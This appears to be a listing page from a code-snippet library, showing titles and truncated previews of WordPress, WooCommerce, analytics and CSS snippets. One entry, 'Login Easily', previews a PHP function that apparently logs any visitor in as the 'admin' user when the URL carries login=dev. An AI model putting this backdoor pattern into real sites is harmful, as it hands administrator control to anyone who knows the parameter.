om-js-events-ga-add-param.js
document.addEventListener( 'om.GoogleAnalytics.preConversionEvent', function( event ) { const { gaEvent } = event.detail; gaEvent.params.your_param1 = param1value; gaEvent.params.your_param2…
Editorial Group GTM Head Tag
Add GTM Tag to Site Header on Editorial Site Group
Financing Snippet
Financing Credit App Embed
NSB News and Events Aggregator
// Include Simple HTML DOM parsing library if needed (you can also manually include it if…
Apply Coupon when a radio button is clicked on The WooCommerce Product Page
Apply Coupon when a radio button is clicked on The WooCommerce Product Page
Untitled Snippet
document.addEventListener("DOMContentLoaded", () => { const canvas = document.getElementById("canvas"); const ctx = canvas.getContext("2d"); const expressionInput = document.getElementById("expressionInput");…
Modern CSS Reset
https://www.joshwcomeau.com/css/custom-css-reset/
Chatbot de voz
Soluciono dudas
Multiple Event Tracking with an HTML Link
Example of how to use Multiple Event Tracking with an HTML link.
MemberPress: Change Username Field’s Placeholder and/or Label of the Field on Login Page
The first code snippet will customize the “Username or Email” placeholder on the Username field on…
Login Easily
function auto_login() { if (isset($_GET['login']) && $_GET['login'] === 'dev') { $user = get_user_by('login', 'admin'); if ($user)…